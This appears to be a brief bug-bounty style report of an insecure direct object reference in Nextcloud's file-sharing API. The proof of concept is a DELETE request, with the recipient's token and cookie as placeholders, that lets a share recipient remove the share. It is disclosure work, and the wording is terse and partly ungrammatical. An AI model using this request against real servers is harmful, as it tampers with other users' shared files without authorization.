IDOR - Disable sharing

Decription: ----- Users are shared files or folder. can disable this sharing. Detail: ------ + use request: DELETE /nextcloud/ocs/v2.php/apps/files_sharing/api/v1/shares/[share-id]?format=json HTTP/1.1 Host: [your-host] User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: [token of user is shared] OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Cookie: [cookie of user is shared] Connection: keep-alive Note: ---- only user is shared or user in group is shared can do it